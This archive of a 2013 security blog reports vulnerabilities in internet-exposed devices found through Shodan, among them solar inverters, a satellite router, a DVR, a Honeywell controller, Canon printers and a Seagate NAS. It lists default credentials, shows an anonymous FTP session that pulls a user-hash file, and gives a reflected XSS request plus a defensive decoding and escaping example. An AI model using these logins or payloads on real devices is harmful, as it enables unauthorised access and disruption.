Archive for September, 2013

Danfoss Solar Inverters – Multiple Vulnerabilities

September 30, 2013

Danfoss Solar Inverters contain a couple of vulnerabilities; I found them via a saved Shodan search. The notes for the search said “mostly TLX series (6-15 kW / inverter)” and the default credentials are admin / admin, which I verified. After that, there is another problem:

Login screen:

[screenshot: danfoss01]

Under Setup -> Communication, the credentials of a mail server are stored in plain text. If the default admin login is not changed, an attacker can obtain the credentials of another server:

[screenshot: danfoss02]

The request is made over plain HTTP via the GET method, not SSL:

[screenshot: danfoss03]

The response is in the clear as seen in a proxy:

[screenshot: danfoss04]


Romantis UHP-1000 Satellite Router

September 27, 2013

Via a saved Shodan search I found that the Romantis UHP-1000 Satellite Router does not require a password for telnet access by default! An admin can optionally set a password for basic access and a separate password for admin access. As you can see, just the basic access gives you a lot of info!

df ~$ telnet 1.2.3.4
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
UHP VSAT Terminal Software 2.5.0-31 (13.11.2012)

Router# help
---------- Interface control
interface ethernet|serial|demod|modulator disable|enable - IF Control
clear interface ethernet|serial|demod|mod - Reinitialize interface
---------- Ethernet interface parameters
ethernet mode ehalf|efull|fhalf|ffull|auto - Speed and duplex selection
arp timeout 30-3600 - ARP table purge interval
---------- Demodulator common parameters
demodulator lnb power off|on - LNB power control
demodulator search 0-20000 - Carrier search bandwidth (+/-KHz)
demodulator reference off|on - TDMA RX connector 10 MHz output
---------- Demodulator profile parameters
demodulator profile a|b disable|enable - Enable/disable profile
demodulator polarization a|b vertical|horizontal - Polarization
demodulator frequency a|b 950000-2150000 - Central frequency (KHz)
demodulator symbolrate a|b 50-34000 - Symbol rate (KSps)
demodulator mode a|b s1|s2 - DVB-S1 or DVB-S2 mode select
demodulator viterbi a|b 1/2|2/3|3/4|5/6|6/7|7/8|auto - FEC: Viterbi
demodulator spectrum a|b off|on|auto - Spectrum Inversion
---------- Demodulator control & diagnostics
demodulator activate a|b - Start carrier profile search
demodulator compensate - Compensate LNB frequency offset
demodulator phase-graph 0-255 - Display phase constellation
demodulator bert qpsk|re|data - Bit error rate meter
demodulator voltage 0-10 - Pointing signal output to USB, dB/V (0-off)
demodulator antenna [0-800] [0-800] - Antenna pointing mode [RF min] [RF max]
demodulator inetvu off|on [0-1] [0-1] - iNetVu mode, GetTX, GetCoords
---------- Modulator parameters
modulator mode s1|s2 - Modulator mode
modulator frequency 950000-1750000 - Central frequency (KHz)
modulator symrate 1-33000 - Symbol rate (KSps)
modulator level [0-360] - TX power level (x -0.1 dBm)
modulator tx off|on|pure-carrier|balance - Tx carrier control
modulator inversion off|on - Spectrum inversion
modulator reference off|on - Modulator 10 MHz output
modulator power off|on - Modulator 24V BUC power
modulator tlc range 0-360 0-360 - Max/min allowed auto TX level
modulator tlc mode off|on - Automatic transmit level control
---------- DVB-S modulator parameters
modulator fec uncoded|1/2|2/3|3/4|5/6|7/8 - FEC mode
---------- DVB-S2 modulator parameters
s2modulator mode ccm|along|ashort - CCM / ACM mode, ACM frame size
s2modulator pilots off|on - Pilots insertion
s2modulator roloff 35|25 - Roloff factor (0.XX)
s2modulator qpsk 13|25|12|35|23|34|45|56|89|910 - QPSK FEC mode
s2modulator 8psk 35|23|34|56|89|910 - 8PSK FEC mode
s2modulator 16apsk 23|34|45|56|89|910 - 16APSK FEC mode
---------- IP & SVLAN parameters
ip address IP_ADDR IP_MASK [1-1020] - Add IP address to interface [VLAN]
ip route IP_ADDR IP_MASK IP_ADDR [1-1020] - Add static route [VLAN]
ip map IP_ADDR IP_MASK ml|mm|mh|md 0-1020 [0-500] [1-1020] - Route network to TX SVLAN [TrSh] [VLAN]
ip delete IP_ADDR IP_MASK [1-1020] - Delete IP address, route or map [VLAN]
ip dscp low|med|high STRING - DSCP values priority assignment
ip proxyarp off|on - Answer ARP requests for TX mapped networks
svlan receive serial|demod|tdma 0-1020 [1-1020] - Add RX SVLAN [VLAN]
svlan delete serial|demod|tdma 0-1020 [1-1020] - Delete SVLAN [VLAN]
udp ports 1-65535 1-65535 - UDP ports mapping for RTP compression FROM TO
udp delete 0-65535 - Delete UDP port mapping
ip screening auto|off|on - IP screening control
ip update off|on - Routing table update prevention
---------- Multicast parameters
multicast mode off|static|igmp - Multicast routing mode
multicast igmp timeout 1-30 :IGMP mappings lifetime (minutes)
---------- TCP acceleration parameters
tcp acceleration off|on - Acceleration state
tcp mtu 400-1460 - Advertized MTU
tcp window 4096-65535 - Advertized TCP window
---------- DHCP parameters
dhcp mode off|on - Protocol state
dhcp range IP_ADDR IP_ADDR - IP address range for DHCP
dhcp dns IP_ADDR IP_ADDR - DNS servers list
---------- RIP protocol parameters
rip advertise none|static|maps|all - RIP route types to advertise
rip next-hop IP_ADDR - RIP next hop to advertise
---------- SNMP protocol parameters
snmp community read|write STRING - Set community strings
snmp access IP_ADDR IP_ADDR - Allow access from
---------- L2 bridge parameters
bridge map ml|mm|mh|md 1-1020 [0-500] [1-1020] - Bridge VLAN to TX SVLAN [TrSh] [VLAN]
bridge delete [1-1020] - Delete bridged VLAN [VLAN]
---------- Traffic Shaper parameters
shaper stream 0-500 0-64000 [0-64000] [0-500] - TS stream CIR(Kbps) [MAXSPEED(Kbps)] [UpStr]
shaper delete 0-500 - Delete TS stream
shaper total bandwidth 0-128000 - Composite channel bandwidth (Kbps)
shaper slope 1-64 - Shaper algorithm slope factor
---------- Time related parameters
time shift -24-24 - Local time zone
time set 0-24 0-60 1-31 1-12 0-99 - Set date/time HH MM DD MM YY
time sntp mode off|client|server|both - SNTP operation mode
time sntp access IP_ADDR [0-1023] - SNTP server access IP VLAN
---------- Overall control
admin - Switch to Administrator mode
password user|administrator - Set passwords
idle timeout 10-30000 - Console or Telnet session timeout
prompt STRING - Set system prompt
unit mode scpc|hub|outroute|inroute|remote|hmesh|fhub|frem|span - Terminal mode
unit key 0-15 [0-65535] [0-65535] [0-65535] - Set features key
speed-interval 1-250 - Time for averaging interface traffic
queues 20-800 20-400 20-200 - TX queues length in packets
watchdog reset|interrupt - Watchdog timer overflow action
reboot stop - Stop delayed reboot
reboot auto 0-120 - Reboot if TDMA down [delay/minutes, <5 - disable]
reboot [0-1000] - Reboot device [delay in minutes]
exit - Log out from console
---------- TDMA common parameters
tdma network 1-7 - Network number
tdma tx inroute 1-31 - Remote TX inroute channel
tdma rx inroute 1-31 - Hub/Mesh RX inroute channel
---------- TDMA hub acquisition parameters
tdma satellite 0-179 0-59 E|W - Satellite position (DEG MIN)
tdma location 0-89 0-59 N|S 0-179 0-59 E|W - Location LAT LON (DEG MIN)
tdma tts source measure|value|location|snmp|gps - Hub TTS source
tdma tts 0-150000 - Manual hub TTS value (us)
tdma command 00000000-00000000 STRING - Command to terminal by SN
$gprmc - Location setting via NMEA-183 GPRMC string
---------- TDMA configuration manager connection
tdma server mode off|routing|tdma|all - Server controlled mode
tdma server access IP_ADDR 0-1000 STRING - Server IP address, VLAN, password
---------- TDMA remote station parameters
station number 1-252 - Remote station number
station dtts source value|location|snmp|gps - Station DTTS source
station location 0-89 0-59 N|S 0-179 0-59 E|W - Location LAT LON (DEG MIN)
station dtts -64000-64000 - Manual station DTTS value (us)
station transmit correction -30000-30000 - TX freq. correction (KHz)
station receive correction -30000-30000 - RX freq. correction (KHz)
station codec 1-2048 - Realtime codec speed KBps
station threshold 1-255 - Realtime speed threshold KBps
station timeout 1-100 - Realtime timeout (s)
station report auto|scpc|tdma - Which C/N level report to hub
---------- TDMA hub/mesh RF parameters
tdma receive 950000-2150000 - Receive central frequency (KHz)
tdma bandwidth x1|x2|x4|x8 - RX acquisition bw. (x +/-6kHz)
tdma transmit 950000-1750000 - Transmit central frequency (KHz)
tdma mesh receive 950000-2150000 - Mesh receive central frequency (KHz)
tdma symbol-rate 50-4000 - Symbol rate (KSps)
tdma fec 2/3|5/6 - FEC rate
tdma spectrum normal|inverted - Receive spectrum inversion
---------- TDMA hub protocol parameters
tdma stations number 1-252 - Stations number
tdma frame 16-252 - Frame length in bursts
tdma length 1-10 - Burst length (x192 symbols)
tdma station state on|off 1-252 [1-252] - Turn on or off station [range]
---------- TDMA bandwidth allocation parameters
tdma active-rate 1-255 - Active stations request rate
tdma idle-rate 1-255 - Idle stations request rate
tdma down-rate 1-255 - Down stations request rate
tdma timeout 2-60 - Stations idling timeout (frames)
tdma guaranteed 1-252 0-252 - Guaranteed bandwidth for station (STN BW)
---------- TDMA transmit level control parameters
tlc hub 20-200 - Desired hub-side receive level (x 0.1dB)
tlc remotes 20-200 - Desired remotes receive level (x 0.1dB)
tlc strategies 0-9 0-9 - Hub TX averageminimum networkown
---------- AMIP protocol parameters
amip mode off|on - AMIP control
amip peer IP_ADDR 1-64000 0-1023 - Controller IP address TCP Port and VLAN
amip message STRING - Send AMIP message
---------- SCPC TLC mode
tlc mode off|on - Mode control
tlc peer IP_ADDR 0-1020 STRING - Peer IP address, VLAN, password
tlc nominal 20-200 - Desired local receive level (x 0.1dB)
tlc acm off|on - ACM mode control
---------- Controlled SCPC mode parameters
cscpc mode off|demod|master|slave - Modulator TX on/off auto-control
cscpc frequency 950000-1700000 - Transmit central frequency (KHz)
cscpc symbol-rate 250-32000 - Symbol rate (KSps)
cscpc standard s1|ccm|along|ashort - Transmission standard S1/S2
cscpc s1 uncoded|1/2|2/3|3/4|5/6|7/8 - FEC mode
cscpc s2 qpsk 12|35|23|34|45|56|89|910 - QPSK FEC mode
cscpc s2 8psk 35|23|34|56|89|910 - 8PSK FEC mode
cscpc qpsk 13|25|12|35|23|34|45|56|89|910 - QPSK FEC mode
cscpc 8psk 35|23|34|56|89|910 - 8PSK FEC mode
cscpc 16apsk 23|34|45|56|89|910 - 16APSK FEC mode
cscpc level 0-360 - TX power level (x -0.1 dBm) 0-default
cscpc activate 00000000-40000000 - Active slave serial number
---------- Redundancy backup parameters
backup mode off|on - Backup mode control
backup timeout 5-250 - Mode switching timeout (s)
backup fault timeout 5-250 - Fault timeout (s)
backup local address IP_ADDR - Local address for independent access
backup remote address IP_ADDR - Peer IP address
---------- Configuration management
config description STRING - Describe current configuration
config load tftp IP_ADDR 0-1000 STRING - Load config from TFTP [VLAN]
config load default - Load default configuration
config load 0-1 - Load configuration from specified profile
config save tftp IP_ADDR 0-1000 STRING - Save config to TFTP [VLAN]
config save 0-1 - Save current configuration to specified profile
---------- Statistics
show interface ethernet|serial|demod|modulator - Interface stats
show errors - Show device errors
show ip [0-1020] - Routing table and forwarding stats [VLAN]
show rtp - RTP header compression stats
show dhcp - DHCP parameters
show snmp - SNMP parameters
show multicast - Multicast stats
show acceleration - TCP acceleration stats
show arp - ARP table
show system - System parameters
show boot - Software boot options
show config - Current configuration
show memory ram|flash|eeprom - Memory state
show shaper - Print Traffic Shaper stats
show tdma - TDMA parameters
show remotes traffic [1-252] - Remotes traffic stats
show remotes [1-252] - Remotes statistics
show cscpc - Display CSCPC parameters
show tlc - SCPC TLC statistics
show backup - Redundancy backup stats
show amip - AMIP stats
clear arp-table - Purge contents of ARP table
clear counters all|ethernet|serial|demod|modulator|ip|tdma - Reset stats
clear log - Purge logs
---------- Logging & debug management
show log - Display logs
logging interface|demod|config|system|tdma off|on - Logging events
debug packets|arp|rtp|ping|igmp|dhcp|backup|otg|rip off|on - Debugging
---------- Diagnostics
ping IP_ADDR [1-1000000] [40-1500] [1-10000] [0-1020] - IP Number Size Interval(ms) VLAN
traffic-generator off - Disable traffic generator
traffic-generator IP_ADDR 1-50000 36-1500 [0-1020] - IP packets/second packet_length [VLAN]
---------- Image management
image load tftp IP_ADDR 0-1000 STRING - Load image by TFTP to RAM [VLAN]
image load xmodem - Load image with X-modem to RAM buffer
image load flash - Copy image from flash to RAM
image write - Write image from RAM to Flash
erase flash - Erase flash bank
---------- Boot control
boot main 0-3 0-1 - Main boot profile FLASH_BANK(0-auto) CONF_BANK
boot temp 0-3 0-1 - Temp boot profile FLASH_BANK(0-none) CONF_BANK
boot fallback timeout 1-10000 - Temp image auto fallback period (min)
boot fallback reason uptime|link-up - Auto fallback reason
boot fallback stop - Abandon auto fallback
---------- Help
help - Print this help
Router# admin
Administrator password:

Router#
telnet> close
Connection closed.
df ~$

Sinapsi eSolar Default Credentials

September 26, 2013

Ran across another saved search in Shodan, this time for Sinapsi eSolar, a web interface to monitor solar power generation, mostly in Italy. Also a good reminder of how many other countries embrace solar power generation while we are so far behind! The default credentials are admin / admin:

You are given the option of “free” access (no login required) to basic info:

[screenshot: esolar0]

[screenshot: esolar2-free_access]

If you log in as admin (password admin) you get full access, including to any web cameras installed to monitor the equipment:

[screenshot: esolar1]

Dedicated Micros EcoSense Digital Video Recorder – Multiple Vulnerabilities

September 25, 2013

The Dedicated Micros EcoSense Digital Video Recorder (DVR) is a “multi-channel recording with simultaneous playback and viewing. The EcoSense can be accessed and controlled from the state-of-the-art, touch sensitive front panel or via a mouse or keyboard, giving the user full access to all the DVR’s features including PTZ control, Alarm and Event Management and Activity Detection.”

I found a manual online but it requires authentication now for some reason and ‘anonymous’ isn’t working. From the manual:

IMPORTANT: By default, no Usernames and Passwords are required to access any of the various menus

By default the EcoSense FTP server is enabled and allows anonymous logins. It also gives you quite a bit of access!

df ~/ecosense$ ftp 192.168.3.40
Connected to 192.168.3.40.
220 ADH FTP SERVER READY TYPE HELP FOR HELP
Name (192.168.3.40:df): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is ADH.
ftp> cd ETC
250 Requested file action okay, completed.
ftp> dir
227 Entering Passive Mode (91,84,157,153,5,144)
150 File status okay; about to open data connection.
d--------- 1 root root 0 Oct 12 2009 .
---------- 1 root root 1182 Sep 29 2009 DAEMONS.INI
---------- 1 root root 673 Sep 29 2009 IDBASE.INI
---------- 1 root root 421 Sep 29 2009 PATHS.INI
---------- 1 root root 4811 Sep 29 2009 SMBCONF.INI
---------- 1 root root 74 Sep 29 2009 urlprofiles.example.ini
---------- 1 root root 528 Sep 29 2009 USERS.INI
---------- 1 root root 1046 Sep 29 2009 WEBUSER.INI
d--------- 1 root root 0 Oct 12 2009 TZ
---------- 1 root root 16384 Dec 31 1969 USER.DB
226 Closing data connection. Transfer succeeded
ftp> get USER.DB
local: USER.DB remote: USER.DB
227 Entering Passive Mode (192,168,3,40,5,146)
150 File status okay; about to open data connection.
100% |*****************************************************************| 16384 23.98 KB/s 00:00 ETA
226 Closing data connection. Transfer succeeded
16384 bytes received in 00:00 (23.97 KB/s)
ftp> bye
221 Service closing control connection. Bye...
df ~/ecosense$ file USER.DB
USER.DB: ASCII text
df ~/ecosense$ strings USER.DB
Menu Configuration control 3a27621475bd00fec8ca6b74d5ef2763 none 0|0 0|0
Remote Users warehouse 7d9657f56a611dbff1cbf00c8428eadd none 0|ff 0|ff
Remote Users control 4f465a3ba5a652583a2b89635496f64d none 0|ff 0|ff
df ~/ecosense$

According to CrackStation that hash isn’t LM, NTLM, md2, md4, md5, md5(md5), md5-half, sha1, sha1(sha1_bin()), sha224, sha256, sha384, sha512, ripeMD160, whirlpool, or MySQL 4.1+. I don’t know enough about figuring out crypto to proceed. Hopefully someone else can figure it out!

Tuxedo Connected Controller Made by Honeywell – Multiple Vulnerabilities

September 24, 2013

[screenshot: honeywell1]

The Tuxedo Connected Controller – Home Security, Automation, Cam (Shodan search) is made by Honeywell (online manual). The first issue is that by default no password is set, leaving the web interface open on the internet. The second issue is that you appear to be able to enumerate internal hosts by adding a new camera:

[screenshot: honeywell3-internal1]

If you get a 404 not found, the host is alive and has a web server. If you get “10060 disconnected”, there is no host at that IP address. Related to this, a configured camera can be referenced by a name or just by its IP address, which gives up internal IPs:

[screenshot: honeywell7-cam_ip_disclosure]

The third issue is that without authentication you can control any lights configured:

[screenshot: honeywell8-lights_and_temp]

LBP#### Canon Printers – Two Issues

September 23, 2013

Several Canon printers (Shodan search) seem to have a web interface that doesn’t require authentication (94418). Models tested:
LBP3560
LBP5460
LBP5960
LBP5970
LBP6650

[screenshot: canon-print01]

From the interface you can see a list of printed documents and usernames. The printed document names may contain some sensitive data, and the usernames are helpful for other attacks:

[screenshot: canon-infodisc1]

You can also upload any file you want to be printed without authentication (End-user Mode). This can be used for pranks or a DoS to keep the device tied up and waste ink:

[screenshot: canon-print02]

udpxy Unauthenticated Reboot DoS / Info Disclosure

September 11, 2013

udpxy is a “small-footprint UNIX/Linux daemon to relay multicast UDP traffic to client’s TCP (HTTP) connection.”

Shodan search: http://www.shodanhq.com/search?q=udpxy

http://target/status

This will give some information on the network traffic going to and from the machine. It also lets you restart the server without authenticating. With a simple shell script you can keep rebooting the service.

[screenshot: udpxy]

Whoever made the search on Shodan also included this info: http://imgur.com/4vZU7GR

Seagate NAS Default Credentials and XSS

September 10, 2013

BlackArmor NAS 110 and BlackArmor NAS 220 both have default admin credentials:

Log in using the default settings. (The user name and password are case-sensitive.)
user name: admin
password: admin

Most fields seem to sanitize input, but I found one that allows a POST-based reflected XSS; the victim has to be authenticated as ‘admin’ (CVE-2013-78008):

POST /admin/system_general.php?lang=en&gi=sy001 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.100
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.100/admin/system_general.php?lang=en&gi=sy001
Cookie: PHPSESSID=4726b9442a30c876867c588f7d98a784; myFavoriteLang=en
Proxy-Connection: Keep-Alive
Content-Length: 280
Content-Type: application/x-www-form-urlencoded

machine_name=Backup&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&old_webgui_protocol=HTTP&webgui_protocol=HTTP&timezone=Europe%2FAthens&ntpservice=on&ntpserverlist=pool.ntp.org&datetime=Mon%2C+02+Sep+2013+08%3A25%3A09+%2B0300&orderdate=2013-09-02&btn=Submit
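As an added illustration (not code from the original post or from Seagate), here is the captured payload decoded the way the NAS form handler would decode it, next to a hypothetical attribute-reflecting template in its vulnerable and HTML-escaped forms, plus a simple check that flags the attribute breakout; the template and the trimmed body are assumptions, not the vendor's PHP.

```python
import html
from urllib.parse import parse_qs

# Constructed sample: the parameters from the captured POST body above that
# matter for the reflected XSS (the remaining fields are omitted).
CAPTURED_BODY = (
    "machine_name=Backup"
    "&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E"
    "&old_webgui_protocol=HTTP&webgui_protocol=HTTP&btn=Submit"
)


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(desc):
    """Reflect the submitted description into an attribute without encoding.

    Hypothetical template showing the pattern the NAS page exhibits: a '"' in
    the value closes the attribute and a '>' closes the tag, so anything that
    follows is parsed as new markup.
    """
    return '<input name="machine_desc" value="%s">' % desc


def render_fixed(desc):
    """Same template, but the value is HTML-escaped (quote=True also escapes quotes)."""
    return '<input name="machine_desc" value="%s">' % html.escape(desc, quote=True)


def breaks_out_of_markup(rendered):
    """Detection: a correctly rendered single <input> tag contains exactly one '<'.

    Any further '<' means the reflected value introduced tags of its own.
    """
    return rendered.count("<") > 1


if __name__ == "__main__":
    desc = decode_form(CAPTURED_BODY)["machine_desc"]
    print("decoded machine_desc:", desc)
    print("vulnerable:", render_vulnerable(desc), breaks_out_of_markup(render_vulnerable(desc)))
    print("fixed:     ", render_fixed(desc), breaks_out_of_markup(render_fixed(desc)))
```

The same escaping applies to every other field the page reflects; input "sanitizing" on some fields is not a substitute for encoding at the point of output.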

Deluge Web UI Default Password

September 9, 2013

It’s fun to see what torrents someone is seeding! Deluge Web UI installs to port 8080, with a default password of ‘deluge’! For easier identification, the server identifies itself as:

Server: TwistedWeb/11.1.0

Shodan and More Defaults

September 8, 2013

Moxa OnCell G3100
OnCell Shodan Search

OnCell Central Web Console
1. Start the web browser.
2. In the Address input box, enter the OnCell Central’s web IP address follow with the 8080 port (ex: 192.168.127.111:8080). Now you are able to see the OnCell Central Manager Welcome page.
3. Enter the default username and password and then click Login.
Username: admin
Password: admin

Read community string (default=public): This is a text password mechanism that is used to weakly authenticate queries to agents of managed network devices.
Write community string (default=private): This is a text password mechanism that is used to weakly authenticate changes to agents of managed network devices.


NetVanta Multiple Devices – 3205 AC, 3430, 1335 PoE, also marketed under Total Access 916 (2nd Gen) I think?

If you telnet to the device, the login banner gives up the default password:

df ~$ telnet target
Trying target...
Connected to target.
Escape character is '^]'.

****** Important ******

Enable and Telnet passwords are configured to "password".

Please change them immediately.

The vlan 1 interface is enabled with an address of 10.10.10.1

Telnet access is also enabled.

User Access Verification

Username:

NetVanta 3430 – NV3430G2 Management Interface. The web interface has a default login of ‘admin’ and password of ‘password’.


Ruckus Wireless ZoneDirector

Accessing ZoneDirector’s Command Line Interface
At the Please Login prompt, enter the admin login name (default: admin) and password (default: admin).


LifeSize Control

LifeSize Control automatically uses the default command line interface credentials when attempting to manage the following devices:

[screenshot: lifesize]